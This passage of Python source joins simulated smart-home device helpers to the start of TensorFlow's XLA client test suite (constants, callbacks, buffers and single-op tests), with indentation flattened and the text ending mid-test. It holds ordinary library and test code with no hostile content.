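    # Marks the device as on, then steps its brightness from 90 down to 10
    # (one step of 10 per second) and finally resets it to 100.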
seconds = 100
for prop in device:
if prop['title'] == "status":
prop['value'] = "true"
if prop['title'] == "brightness":
while seconds > 10:
seconds = seconds - 10
prop['value'] = str(seconds)
time.sleep(1)
if seconds == 10:
prop['value'] = str(100)
def turnOnHeating_function(params, device):
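    # Expects params[1] to be a duration in seconds: switches the device's status to
    # "true" and starts a background timer that flips it back to "false" afterwards.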
if len(params) < 2:
return None
for prop in device:
if prop['title'] == "status":
prop['value'] = "true"
threading.Thread(target=lambda: timer(params[1], prop, "false")).start()
return True
def fade_action(params, device):
threading.Thread(target=lambda: fade_out(device)).start()
return True
def isSomeoneInside(params, device):
return random.choice(["true", "false"])
def unlockForSeconds(params, device):
if len(params) < 2:
return None
for prop in device:
if prop['title'] == "status":
prop['value'] = "true"
threading.Thread(target=lambda: timer(params[1], prop, "false")).start()
return True
def suggestTemperature(params, device):
return random.randint(20, 30)
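# A hedged usage sketch: the functions above expect `device` to be a list of
# property dicts, for example
#   device = [{"title": "status", "value": "false"}, {"title": "brightness", "value": "100"}]
#   turnOnHeating_function(["heating", "5"], device)  # hypothetical params; status reverts after ~5 s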
|
xla_client_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Backend-dependent tests for the Python XLA client."""
import functools
import itertools
import re
import threading
import unittest
from absl import flags
from absl import logging
from absl.testing import absltest
from absl.testing import parameterized
import numpy as np
from tensorflow.compiler.xla.python import xla_client
# pylint: disable=g-import-not-at-top
try:
# This import is only used for GPU; the dependency is incompatible with TPU
# so it results in an import error.
from tensorflow.python.framework import test_util
except ImportError:
test_util = None
# pylint: disable=g-import-not-at-top
try:
from tensorflow.compiler.xla.python import custom_call_for_test
except ImportError:
custom_call_for_test = None
bfloat16 = xla_client.bfloat16
ops = xla_client.ops
FLAGS = flags.FLAGS
# We choose to ignore pylint's complaints about complex comprehensions, which we
# use widely for parameterizing tests.
# pylint: disable=g-complex-comprehension
def TestFactory(xla_backend,
cloud_tpu=False,
tfrt_tpu=False,
external_tpu=False):
tests = []
if not cloud_tpu:
int_dtypes = [np.int32, np.int64, np.uint32, np.uint64]
# TODO(phawkins): test np.float16, where supported.
float_dtypes = [bfloat16, np.float32, np.float64]
complex_dtypes = [np.complex64, np.complex128]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
else:
int_dtypes = [np.int32, np.uint32]
float_dtypes = [np.float32]
complex_dtypes = [np.complex64]
standard_dtypes = int_dtypes + float_dtypes + complex_dtypes + [np.bool_]
dlpack_dtypes = int_dtypes + float_dtypes + [np.bool_] + complex_dtypes
class ComputationTest(parameterized.TestCase):
"""Base class for running an XLA Computation through the local client."""
def setUp(self):
super(ComputationTest, self).setUp()
self.backend = xla_backend()
def _NewComputation(self, name=None):
if name is None:
name = self.id()
return xla_client.XlaBuilder(name)
def _Execute(self, c, arguments):
compiled_c = self.backend.compile(c.build())
return xla_client.execute_with_python_values(
compiled_c, arguments, backend=self.backend)
def _ExecuteAndAssertWith(self, assert_func, c, arguments, expected):
assert expected is not None
results = self._Execute(c, arguments)
self.assertLen(results, len(expected))
for result, e in zip(results, expected):
# Numpy's comparison methods are a bit too lenient by treating inputs as
# "array-like", meaning that scalar 4 will be happily compared equal to
# [[4]]. We'd like to be more strict so assert shapes as well.
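        # For instance, np.testing.assert_allclose(4, [[4]]) passes via broadcasting,
        # even though np.asanyarray(4).shape == () and np.asanyarray([[4]]).shape == (1, 1).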
self.assertEqual(np.asanyarray(result).shape, np.asanyarray(e).shape)
assert_func(result, e)
def _ExecuteAndCompareExact(self, c, arguments=(), expected=None):
self._ExecuteAndAssertWith(np.testing.assert_equal, c, arguments,
expected)
def _ExecuteAndCompareClose(self,
c,
arguments=(),
expected=None,
rtol=1e-4,
atol=0):
self._ExecuteAndAssertWith(
functools.partial(np.testing.assert_allclose, rtol=rtol, atol=atol),
c, arguments, expected)
def NumpyArrayF32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float32 dtype."""
return np.array(*args, dtype=np.float32, **kwargs)
def NumpyArrayF64(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.float64 dtype."""
return np.array(*args, dtype=np.float64, **kwargs)
def NumpyArrayS32(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.int32 dtype."""
return np.array(*args, dtype=np.int32, **kwargs)
def NumpyArrayBool(*args, **kwargs):
"""Convenience wrapper to create Numpy arrays with a np.bool_ dtype."""
return np.array(*args, dtype=np.bool_, **kwargs)
class ComputationPrinting(absltest.TestCase):
def setUp(self):
super(ComputationPrinting, self).setUp()
self.backend = xla_backend()
def ExampleComputation(self):
builder = xla_client.XlaBuilder("acomputation")
p0 = ops.Parameter(builder, 0, xla_client.shape_from_pyval(np.float32(0)))
p1 = ops.Parameter(
builder, 1, xla_client.shape_from_pyval(np.zeros((4,), np.float32)))
x = ops.Mul(p0, p1)
ops.Add(x, x)
return builder.build()
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleToHloText(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
self.assertTrue(hlo_text.startswith("HloModule acomputation"))
self.assertIn("fusion", hlo_text)
@unittest.skipIf(cloud_tpu, "not implemented")
def testCompiledHloModuleAsSerializedProto(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
hlo_modules = executable.hlo_modules()
self.assertLen(hlo_modules, 1)
hlo_text = hlo_modules[0].to_string()
proto = hlo_modules[0].as_serialized_hlo_module_proto()
hlo_module_roundtrip = xla_client.XlaComputation(proto).get_hlo_module()
hlo_text_roundtrip = hlo_module_roundtrip.to_string()
self.assertEqual(hlo_text, hlo_text_roundtrip)
@unittest.skipIf(cloud_tpu, "not implemented")
def testStableComputationSerialization(self):
# Ideally we would test identical computations produced in different
# processes. For now we have this limited smoke test.
computation = self.ExampleComputation()
ref = computation.as_serialized_hlo_module_proto()
for _ in range(10):
self.assertEqual(computation.as_serialized_hlo_module_proto(), ref)
@unittest.skipIf(cloud_tpu, "not implemented")
def testFlopEstimate(self):
computation = self.ExampleComputation()
properties = xla_client._xla.hlo_module_cost_analysis(
self.backend, computation.as_hlo_module())
self.assertEqual(properties["flops"], 8.0)
def testFingerprint(self):
computation = self.ExampleComputation()
executable = self.backend.compile(computation)
fingerprint = executable.fingerprint
if self.backend.platform == "tpu" and not cloud_tpu:
logging.info("fingerprint: %s", fingerprint)
self.assertNotEmpty(fingerprint)
else:
self.assertIsNone(fingerprint)
tests.append(ComputationPrinting)
class ComputationsWithConstantsTest(ComputationTest):
"""Tests focusing on Constant ops."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes + float_dtypes)
def testConstantScalarSum(self, dtype):
if dtype == np.int8 and self.backend.platform == "tpu":
self.skipTest("TPU doesn't support int8")
c = self._NewComputation()
ops.Add(ops.Constant(c, dtype(1.11)), ops.Constant(c, dtype(3.14)))
self._ExecuteAndCompareClose(c, expected=[dtype(1.11) + dtype(3.14)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorMul(self, dtype):
c = self._NewComputation()
ops.Mul(
ops.Constant(c, np.array([2.5, 3.3, -1.2, 0.7], dtype)),
ops.Constant(c, np.array([-1.2, 2, -2, -3], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[-3, 6.6, 2.4, -2.1]], rtol=3e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarDiv(self, dtype):
c = self._NewComputation()
ops.Div(
ops.Constant(c, np.array([1.5, 2.5, 3.0, -10.8], dtype=dtype)),
ops.Constant(c, dtype(2.0)))
self._ExecuteAndCompareClose(
c, expected=[[0.75, 1.25, 1.5, -5.4]], rtol=2e-3)
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantVectorScalarPow(self, dtype):
c = self._NewComputation()
ops.Pow(
ops.Constant(c, np.array([1.5, 2.5, 3.0], dtype=dtype)),
ops.Constant(c, dtype(2.)))
self._ExecuteAndCompareClose(c, expected=[[2.25, 6.25, 9.]])
def testIota(self):
c = self._NewComputation()
ops.Iota(c, xla_client.PrimitiveType.F32, 10)
self._ExecuteAndCompareExact(
c, expected=[np.arange(10, dtype=np.float32)])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testBroadcastedIota(self, dtype):
c = self._NewComputation()
shape = xla_client.Shape.array_shape(
xla_client.dtype_to_etype(dtype), (2, 3))
ops.Iota(c, shape, 1)
expected = np.array([[0, 1, 2], [0, 1, 2]], dtype=dtype)
self._ExecuteAndCompareExact(c, expected=[expected])
def testBooleanAnd(self):
c = self._NewComputation()
ops.And(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, False, False, False]])
def testBooleanOr(self):
c = self._NewComputation()
ops.Or(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[True, True, True, False]])
def testBooleanXor(self):
c = self._NewComputation()
ops.Xor(
ops.Constant(c, NumpyArrayBool([True, False, True, False])),
ops.Constant(c, NumpyArrayBool([True, True, False, False])))
self._ExecuteAndCompareExact(c, expected=[[False, True, True, False]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2D(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.array([[1, 2, 3], [4, 5, 6]], dtype=dtype)),
ops.Constant(c, np.array([[1, -1, 1], [-1, 1, -1]], dtype=dtype)))
self._ExecuteAndCompareClose(c, expected=[[[2, 1, 4], [3, 6, 5]]])
def testShiftLeft(self):
c = self._NewComputation()
ops.ShiftLeft(
ops.Constant(c, NumpyArrayS32([3])),
ops.Constant(c, NumpyArrayS32([2])))
self._ExecuteAndCompareClose(c, expected=[[12]])
def testShiftRightArithmetic(self):
c = self._NewComputation()
ops.ShiftRightArithmetic(
ops.Constant(c, NumpyArrayS32([-2])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[-1]])
def testShiftRightLogical(self):
c = self._NewComputation()
ops.ShiftRightLogical(
ops.Constant(c, NumpyArrayS32([-1])),
ops.Constant(c, NumpyArrayS32([1])))
self._ExecuteAndCompareClose(c, expected=[[2**31 - 1]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim0(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 0 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(0,))
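      # With broadcast_dimensions=(0,) the 1D operand lines up with output dim 0,
      # i.e. roughly `a + b[:, np.newaxis]` in NumPy terms (row i gets b[i] added).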
self._ExecuteAndCompareClose(
c, expected=[[[11, 12, 13], [24, 25, 26], [37, 38, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testSum2DWith1DBroadcastDim1(self, dtype):
# sum of a 2D array with a 1D array where the latter is replicated across
# dimension 1 to match the former's shape.
c = self._NewComputation()
ops.Add(
ops.Constant(c,
np.array([[1, 2, 3], [4, 5, 6], [7, 8, 9]],
dtype=dtype)),
ops.Constant(c, np.array([10, 20, 30], dtype=dtype)),
broadcast_dimensions=(1,))
self._ExecuteAndCompareClose(
c, expected=[[[11, 22, 33], [14, 25, 36], [17, 28, 39]]])
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConstantAxpy(self, dtype):
c = self._NewComputation()
ops.Add(
ops.Mul(
ops.Constant(c, dtype(2)),
ops.Constant(c, np.array([2.2, 3.3, 4.4, 5.5], dtype=dtype))),
ops.Constant(c, np.array([100, -100, 200, -200], dtype)))
self._ExecuteAndCompareClose(
c, expected=[[104.4, -93.4, 208.8, -189]], rtol=2e-3)
def testCustomCall(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
ops.CustomCallWithLayout(
c,
b"test_subtract_f32",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
],
api_version=xla_client.ops.CustomCallApiVersion
.API_VERSION_STATUS_RETURNING)
self._ExecuteAndCompareClose(c, expected=[0.75])
def testCustomCallWithUnifiedApi(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
for name, fn in custom_call_for_test.cpu_custom_call_targets.items():
xla_client.register_custom_call_target(name, fn, platform="cpu")
opaque_str = b"foo"
ops.CustomCallWithLayout(
c,
b"test_add_input_and_opaque_len",
operands=[
ops.Constant(c, np.float32(1.25)),
ops.Constant(c, np.float32(0.5))
],
shape_with_layout=xla_client.Shape.array_shape(
np.dtype(np.float32), (), ()),
operand_shapes_with_layout=[
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
xla_client.Shape.array_shape(np.dtype(np.float32), (), ()),
],
          # The "test_add_input_and_opaque_len" target adds len(opaque) == 3 to its input.
opaque=opaque_str,
api_version=xla_client.ops.CustomCallApiVersion
.API_VERSION_STATUS_RETURNING_UNIFIED)
self._ExecuteAndCompareClose(c, expected=[1.25 + len(opaque_str)])
tests.append(ComputationsWithConstantsTest)
class PythonCallbackTest(ComputationTest):
def testPythonCallback(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
f = lambda x, y: (x + y, x - y)
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
arg1 = np.array([10, 15, -2, 7], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
p1 = ops.Parameter(c, 1, shape)
out, keepalive = self.backend.emit_python_callback(
f, c, [p0, p1], [shape, shape])
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 + arg1, arg0 - arg1])
del out, keepalive
def testPythonCallbackCanHandleExceptions(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
raise ValueError("Value error raised!")
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
shape = shape.with_major_to_minor_layout_if_absent()
p0 = ops.Parameter(c, 0, shape)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape], has_side_effects=True)
with self.assertRaisesRegex(xla_client.XlaRuntimeError,
"Value error raised!"):
self._Execute(c, [arg0])
del out, keepalive
def testTokens(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x, y):
assert y is None, y
return None, x + 1
arg0 = np.array([9, 43, -101, 22], dtype=np.int32)
shape = xla_client.shape_from_pyval(arg0)
token_shape = xla_client.Shape.token_shape()
p0 = ops.Parameter(c, 0, shape)
token = ops.CreateToken(c)
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0, token], [token_shape, shape])
out = ops.GetTupleElement(out, 1)
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 + 1])
del out, keepalive
def testStriding(self):
if self.backend.platform != "cpu":
self.skipTest("Test requires cpu platform")
c = self._NewComputation()
def _Callback(x):
assert x.flags.f_contiguous, x.strides
# Force the output array to have C layout, which will require a
# transpose back to the expected Fortran layout.
return np.ascontiguousarray(x * 2),
arg0 = np.arange(12, dtype=np.int16).reshape(3, 4)
shape_f_layout = xla_client.Shape.array_shape(
arg0.dtype, arg0.shape, layout=(0, 1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
out, keepalive = self.backend.emit_python_callback(
_Callback, c, [p0], [shape_f_layout], [shape_f_layout])
self._ExecuteAndCompareExact(c, arguments=[arg0], expected=[arg0 * 2])
del out, keepalive
tests.append(PythonCallbackTest)
class ComputationFromProtoTest(absltest.TestCase):
"""Test computation execution from HLO proto."""
def setUp(self):
super(ComputationFromProtoTest, self).setUp()
self.backend = xla_backend()
def testExecuteFromProto(self):
# Build the HLO proto
b = xla_client.XlaBuilder("computation")
ops.Add(ops.Constant(b, np.int32(1)), ops.Constant(b, np.int32(2)))
serialized_proto = b.build().as_serialized_hlo_module_proto()
# Load and execute the proto
c = xla_client.XlaComputation(serialized_proto)
ans, = xla_client.execute_with_python_values(
self.backend.compile(c), (), backend=self.backend)
np.testing.assert_equal(ans, np.int32(3))
tests.append(ComputationFromProtoTest)
class ParametersTest(ComputationTest):
"""Tests focusing on Parameter ops and argument-passing."""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in int_dtypes)
def testScalarTimesVector(self, dtype):
c = self._NewComputation()
arg0 = np.array(3, dtype=dtype)
arg1 = np.array([10, 15, -2, 7], dtype=dtype)
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
ops.Mul(p0, p1)
self._ExecuteAndCompareExact(
c, arguments=[arg0, arg1], expected=[arg0 * arg1])
# TODO(phawkins): test comparison harness doesn't support bfloat16
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes if dtype != bfloat16)
def testScalarMinusVectorExplicitNumbering(self, dtype):
# Use explicit numbering and pass parameter_num first. Sub is used since
# it's not commutative and can help catch parameter reversal within the
# computation.
c = self._NewComputation()
arg0 = np.array(2.0, dtype=dtype)
arg1 = np.array([-2.3, 3.3, -4.3, 5.3], dtype=dtype)
p1 = ops.Parameter(c, 1, xla_client.shape_from_pyval(arg1))
p0 = ops.Parameter(c, 0, xla_client.shape_from_pyval(arg0))
ops.Sub(p1, p0)
self._ExecuteAndCompareClose(
c, arguments=[arg0, arg1], expected=[arg1 - arg0])
tests.append(ParametersTest)
class BufferTest(ComputationTest):
"""Tests focusing on execution with Buffers."""
def testConstantSum(self):
c = self._NewComputation()
ops.Add(
ops.Constant(c, np.float32(1.11)), ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(c, expected=[4.25])
def testOneParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
self._ExecuteAndCompareClose(
c, arguments=[NumpyArrayF32(1.11)], expected=[4.25])
def testTwoParameterSum(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Parameter(c, 1, xla_client.shape_from_pyval(NumpyArrayF32(0.))))
self._ExecuteAndCompareClose(
c,
arguments=[NumpyArrayF32(1.11),
NumpyArrayF32(3.14)],
expected=[4.25])
@unittest.skipIf(cloud_tpu, "not implemented")
def testCannotCallWithDeletedBuffers(self):
c = self._NewComputation()
ops.Add(
ops.Parameter(c, 0, xla_client.shape_from_pyval(NumpyArrayF32(0.))),
ops.Constant(c, np.float32(3.14)))
arg = NumpyArrayF32(1.11)
compiled_c = self.backend.compile(c.build())
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.delete()
with self.assertRaises(xla_client.XlaRuntimeError):
compiled_c.execute([arg_buffer])
def testXlaShape(self):
pyval = np.array([[1., 2.]], np.float32)
local_buffer = self.backend.buffer_from_pyval(pyval)
xla_shape = local_buffer.xla_shape()
self.assertEqual(xla_shape.dimensions(), (1, 2))
self.assertEqual(np.dtype(xla_shape.element_type()), np.dtype(np.float32))
def testXlaShapeIndex(self):
a = xla_client.ShapeIndex((1, 2))
b = xla_client.ShapeIndex((1, 2))
c = xla_client.ShapeIndex((2, 3))
self.assertEqual(a, b)
self.assertNotEqual(b, c)
def testLayout(self):
f32 = xla_client.PrimitiveType.F32
a = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
b = xla_client.Shape.array_shape(f32, (2, 3), (0, 1)).layout()
c = xla_client.Shape.array_shape(f32, (2, 3), (1, 0)).layout()
self.assertEqual(a.minor_to_major(), (0, 1))
self.assertEqual(b.minor_to_major(), (0, 1))
self.assertEqual(c.minor_to_major(), (1, 0))
self.assertEqual(a, b)
self.assertNotEqual(a, c)
self.assertNotEqual(b, c)
self.assertEqual(hash(a), hash(b))
self.assertNotEqual(hash(a), hash(c))
self.assertNotEqual(hash(b), hash(c))
def testBlockUntilReadyWorks(self):
arg = np.array([[1., 2.]], np.float32)
arg_buffer = self.backend.buffer_from_pyval(arg)
arg_buffer.block_until_ready()
# This test merely checks that nothing goes awry when we call
# block_until_ready(); it's difficult to test anything else.
def testBlockUntilReadyRaisesOnDeletedBuffer(self):
arg = np.array([[1., 2.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
buffer.delete()
with self.assertRaisesRegex(
RuntimeError,
re.escape(
"BlockHostUntilReady() called on deleted or donated buffer")):
buffer.block_until_ready()
def testDeviceArrayBaseSignatures(self):
# When extending `DeviceArrayBase`, the object behaves as a `DeviceArray`
# and thus needs to correctly implement the following methods.
arg = np.array([[1., 2., 3.]], np.float32)
buffer = self.backend.buffer_from_pyval(arg)
if not isinstance(buffer, xla_client.DeviceArrayBase):
        raise unittest.SkipTest(
            "The object of type {} does not extend DeviceArrayBase".format(
                type(buffer)))
self.assertEqual(buffer.__array_priority__, 100)
self.assertEqual(buffer.shape, (1, 3))
self.assertEqual(buffer.dtype, np.float32)
self.assertEqual(buffer.size, 3)
self.assertEqual(buffer.ndim, 2)
self.assertIs(buffer, buffer.block_until_ready())
self.assertTrue(buffer.is_ready())
buffer.delete()
with self.assertRaises(xla_client.XlaRuntimeError):
buffer.block_until_ready()
with self.assertRaises(xla_client.XlaRuntimeError):
buffer.is_ready()
def testOnDeviceSizeInBytes(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support OnDeviceSizeInBytes.")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertEqual(arg0_buffer.on_device_size_in_bytes(), 0)
# OnDeviceSizeInBytes varies depending on the platform. Confirm there's
# a reasonable value.
self.assertGreater(arg1_buffer.on_device_size_in_bytes(), 0)
self.assertGreater(arg2_buffer.on_device_size_in_bytes(), 0)
def testLiveBuffers(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support LiveBuffers().")
self.assertEmpty(self.backend.live_buffers())
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertLen(self.backend.live_buffers(), 3)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg1_buffer)
self.assertIs(self.backend.live_buffers()[2], arg0_buffer)
self.assertEqual(self.backend.devices()[0].live_buffers(),
self.backend.live_buffers())
arg1_buffer.delete()
self.assertLen(self.backend.live_buffers(), 2)
self.assertIs(self.backend.live_buffers()[0], arg2_buffer)
self.assertIs(self.backend.live_buffers()[1], arg0_buffer)
arg0_buffer.delete()
arg2_buffer.delete()
self.assertEmpty(self.backend.live_buffers())
def testCopyToHost(self):
arg0 = np.array([[1., 2.]], np.float32)
arg1 = np.array([[3., 4.]], np.float32)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
# Prefetch two buffers using copy_to_host_async, and then retrieve their
# values using to_py.
arg0_buffer.copy_to_host_async()
arg0_buffer.copy_to_host_async() # Duplicate calls don't do anything.
arg1_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
np.testing.assert_equal(arg1, arg1_buffer.to_py())
# copy_to_host_async does nothing after to_py is called.
arg0_buffer.copy_to_host_async()
np.testing.assert_equal(arg0, arg0_buffer.to_py())
def testDevice(self):
x = np.arange(8, dtype=np.int32)
for device in self.backend.local_devices():
buf = self.backend.buffer_from_pyval(x, device=device)
self.assertEqual(buf.device(), device)
np.testing.assert_equal(x, buf.to_py())
def testStandardTypes(self):
for dtype in standard_dtypes:
if dtype == bfloat16 or dtype == np.complex128:
continue
arr = self.backend.buffer_from_pyval(np.array([0, 1], dtype))
arr = arr.to_py()
self.assertEqual(dtype, type(arr[0]))
def testUnsafeBufferPointer(self):
if not isinstance(self.backend, xla_client.Client):
self.skipTest("TPU Driver doesn't support UnsafeBufferPointer().")
arg0 = np.array([])
arg1 = np.array([[0., 1., 2.]], np.float32)
arg2 = np.array([[3., 4., 5.]], bfloat16)
arg0_buffer = self.backend.buffer_from_pyval(arg0)
arg1_buffer = self.backend.buffer_from_pyval(arg1)
arg2_buffer = self.backend.buffer_from_pyval(arg2)
self.assertGreaterEqual(arg0_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg1_buffer.unsafe_buffer_pointer(), 0)
self.assertGreaterEqual(arg2_buffer.unsafe_buffer_pointer(), 0)
@unittest.skipIf(cloud_tpu, "not implemented")
def testClone(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
z = y.clone()
self.assertNotEqual(id(x), id(y))
np.testing.assert_array_equal(y.to_py(), z.to_py())
self.assertEqual(y.unsafe_buffer_pointer(), z.unsafe_buffer_pointer())
@unittest.skipIf(cloud_tpu, "not implemented")
def testJaxAttributesHaveCorrectDefaults(self):
x = np.array([[3., 4., 5.]], np.float32)
y = self.backend.buffer_from_pyval(x)
self.assertIsNone(y.aval)
self.assertIsNone(y._device)
tests.append(BufferTest)
class SingleOpTest(ComputationTest):
"""Tests for single ops.
The goal here is smoke testing - to exercise the most basic functionality of
    single XLA ops. As few additional ops as possible are added around the op
    being tested.
"""
@parameterized.named_parameters({
"testcase_name": "_{}".format(dtype.__name__),
"dtype": dtype,
} for dtype in float_dtypes)
def testConcatenate(self, dtype):
c = self._NewComputation()
args = (
ops.Constant(c, np.array([1.0, 2.0, 3.0], dtype=dtype)),
ops.Constant(c, np.array([4.0, 5.0, 6.0], dtype=dtype)),
)
ops.ConcatInDim(c, args, dimension=0)
self._ExecuteAndCompareExact(
c, expected=[np.array([1.0, 2.0, 3.0, 4.0, 5.0, 6.0], dtype=dtype)])
# pyformat: disable
@parameterized.named_parameters({
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
} for src_dtype, dst_dtype in itertools.permutations(
[np.bool_, np.int32, np.int64, np.float32, np.float64], 2))
# pyformat: enable
def testConvertElementType(self, src_dtype, dst_dtype):
if ((src_dtype in [np.int64, np.float64] or
dst_dtype in [np.int64, np.float64]) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.ConvertElementType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
expected = np.array(x, dtype=dst_dtype)
self.assertEqual(result[0].shape, expected.shape)
self.assertEqual(result[0].dtype, expected.dtype)
np.testing.assert_equal(result[0], expected)
# pyformat: disable
@parameterized.named_parameters(
{
"testcase_name": "_{}_{}".format(src_dtype.__name__,
dst_dtype.__name__),
"src_dtype": src_dtype,
"dst_dtype": dst_dtype,
}
for dtypes in [[np.int32, np.float32], [np.int64, np.float64]]
for src_dtype, dst_dtype in itertools.permutations(dtypes, 2))
# pyformat: enable
def testBitcastConvertType(self, src_dtype, dst_dtype):
if (np.float64 in (src_dtype, dst_dtype) and
self.backend.platform == "tpu"):
self.skipTest("TPU doesn't support float64")
c = self._NewComputation()
x = np.array([0, 1, 0, 0, 1], dtype=src_dtype)
ops.BitcastConvertType(
ops.Constant(c, x), xla_client.dtype_to_etype(dst_dtype))
result = xla_client.execute_with_python_values(
self.backend.compile(c.build()), (), backend=self.backend)
self.assertLen(result, 1)
